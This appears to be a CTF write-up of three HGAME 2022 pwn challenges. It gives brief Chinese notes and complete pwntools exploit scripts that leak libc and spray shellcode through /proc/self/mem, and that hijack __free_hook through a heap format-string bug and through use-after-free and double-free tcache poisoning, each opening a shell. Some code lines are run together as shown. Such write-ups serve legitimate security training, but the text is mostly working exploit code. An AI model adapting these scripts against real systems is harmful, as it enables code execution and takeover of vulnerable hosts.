PWN-COMPETITION-HGAME2022-Week2
- blind
- echo_sever
- oldfashion_note
blind
访问/proc/self/mem即可修改当前进程的内存,.text段也是可修改的
程序开始的时候直接输出了write的地址,泄露libc,然后在__libc_start_main上喷射shellcode
# -*- coding:utf-8 -*-
from pwn import *
from pwnlib.util.iters import mbruteforce
import itertools
import hashlib
context.log_level="debug"
context.arch="amd64"
context.os="linux"
io=remote("chuj.top",51739)
libc=ELF("./libc6_2.27-3ubuntu1.4_amd64.so")io.recvuntil("sha256(????) == ")
code=io.recvuntil("\n")[:-1]
charset = string.printable
proof = mbruteforce(lambda x: hashlib.sha256((x).encode()).hexdigest() == code, charset, 4, method='fixed')
io.sendlineafter("????> ",proof)io.recvuntil("write: ")
write_addr=int(io.recvuntil("\n")[:-1],16)
print("write_addr=="+hex(write_addr))
libc_base=write_addr-libc.sym["write"]
__libc_start_main=libc_base+libc.sym["__libc_start_main"]io.sendlineafter(">> ", "/proc/self/mem\x00")io.sendlineafter(">> ", str(__libc_start_main))payload=asm(shellcraft.sh()).rjust(0x300, asm("nop")) +"\n"
io.sendafter(">> ", payload)io.interactive()
echo_sever
堆上的格式化字符串漏洞
当输入的v0为0时,realloc(ptr,0)相当于free(ptr)
于是考虑将free_hook写为one-gadget
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
context.log_level="debug"
io=process("./echo")
#io=remote("chuj.top",52100)
elf=ELF("./echo")
libc=ELF("./libc-2.31.so")#io_base = io.libs()[io.cwd + io.argv[0].strip('.')]
#offset=0x129F
#gdb.attach(io,"b * "+str(io_base+offset))
#pause()def get_pwd(str, num):if(num == 1):for x in str:yield xelse:for x in str:for y in get_pwd(str, num-1):yield x+ystrKey=""
for i in range(33,127):strKey+=chr(i)#io.recvuntil("sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#for x in get_pwd(strKey,4):
# h=hashlib.sha256()
# h.update(x.encode(encoding='utf-8'))
# h_hexdigest=h.hexdigest()
# if h_hexdigest==code:
# io.sendline(x)
# break#泄露libc基址,栈地址,程序基址
payload="%13$p.%15$p.%17$p.".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)
io.recvuntil("0x")
libc_base=int(io.recvuntil(".")[:-1],16)-243-libc.sym["__libc_start_main"] #libc基址
print("libc_base=="+hex(libc_base))
io.recvuntil("0x")
stack_addr=int(io.recvuntil(".")[:-1],16) #栈地址
print("stack_addr=="+hex(stack_addr))
io.recvuntil("0x")
proc_base=int(io.recvuntil(".")[:-1],16)-elf.sym["main"] #程序基址
print("proc_base=="+hex(proc_base))free_hook=libc_base+libc.sym["__free_hook"]#free_hook地址
print("free_hook=="+hex(free_hook))
oggs=[0xe6c7e,0xe6c81,0xe6c84]
ogg=libc_base+oggs[0] # one-gadget地址
print("ogg=="+hex(ogg))#在free_hook地址出写ogg的低2字节
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr2=free_hook&0xffff
payload="%"+str(addr2)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr3=stack_addr-0xB0+2
addr3=addr3&0xffff
payload="%"+str(addr3)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr4=(free_hook>>16)&0xffff
payload="%"+str(addr4)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr5=stack_addr-0xB0+4
addr5=addr5&0xffff
payload="%"+str(addr5)+"c"+"%15$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr6=(free_hook>>32)&0xffff
payload="%"+str(addr6)+"c"+"%43$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr7=(ogg)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)##########################################################################################在free_hook+2地址出写ogg的中间2字节
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%6$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr2=(free_hook+2)&0xffff
payload="%"+str(addr2)+"c"+"%10$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr7=(ogg>>16)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)##########################################################################################在free_hook+4地址出写ogg的高2字节
#
addr1=stack_addr-0xB0
addr1=addr1&0xffff
payload="%"+str(addr1)+"c"+"%6$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr2=(free_hook+4)&0xffff
payload="%"+str(addr2)+"c"+"%10$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#
addr7=(ogg>>32)&0xffff
payload="%"+str(addr7)+"c"+"%21$hn".ljust(100,"\x00")
io.sendlineafter("length:\n>> ",str(len(payload)))
io.send(payload)#发送0,使realloc(ptr,0)相当于free(ptr),触发free_hook,执行one-gadget
io.sendlineafter("length:\n>> ",str(0))#pause()io.interactive()
oldfashion_note
delete_note函数存在UAF和double free漏洞
UAF可以泄露libc基址
double free可以让新的chunk能够malloc到free_hook地址处
写free_hook为system,于是free("/bin/sh\x00")相当于system("/bin/sh\x00"),从而getshell
from pwn import *
import hashlib
context.log_level="debug"
io=process("./note")
#io=remote("chuj.top",51585)
elf=ELF("./note")
libc=ELF("./libc-2.31.so")def get_pwd(str, num):if(num == 1):for x in str:yield xelse:for x in str:for y in get_pwd(str, num-1):yield x+ystrKey=""
for i in range(33,127):strKey+=chr(i)#io.recvuntil(b"sha256(????) == ")
#code=io.recvuntil("\n")[:-1]
#for x in get_pwd(strKey,4):
# h=hashlib.sha256()
# h.update(x.encode(encoding='utf-8'))
# h_hexdigest=h.hexdigest()
# if h_hexdigest==code:
# io.sendline(x)
# breakdef alloc(idx,size,content):io.sendlineafter(">> ","1")io.recvuntil("index?\n>> ")io.sendline(str(idx))io.recvuntil("size?\n>> ")io.sendline(str(size))io.recvuntil("content?\n>> ")io.sendline(content)def free(idx):io.sendlineafter(">> ","3")io.recvuntil("index?\n>> ")io.sendline(str(idx))def show(idx):io.sendlineafter(">> ","2")io.recvuntil("index?\n>> ")io.sendline(str(idx))for i in range (7):alloc(i,0x100,'aaaa')alloc(7,0x100,'aaaa')
alloc(8,0x20,'/bin/sh\x00')
for i in range (7):free(i)free(7)
show(7)
libc_base=u64(io.recvuntil('\n')[:-1].ljust(8,'\x00'))-0x1ebbe0
print("libc_base=="+hex(libc_base))
system=libc_base+libc.sym["system"]
print("system=="+hex(system))
free_hook=libc_base+libc.sym["__free_hook"]
print("free_hook=="+hex(free_hook))for i in range (7):alloc(i,0x50,'aaaa')alloc(7,0x50,'aaaa')
alloc(8,0x50,'aaaa')
alloc(9,0x20,'/bin/sh\x00')
for i in range (7):free(i)free(7)
free(8)
free(7)for i in range (7):alloc(i,0x50,'aaaa')alloc(10,0x50,p64(free_hook))
alloc(11,0x50,p64(free_hook))
alloc(12,0x50,p64(free_hook))
alloc(13,0x50,p64(system))free(9)io.interactive()
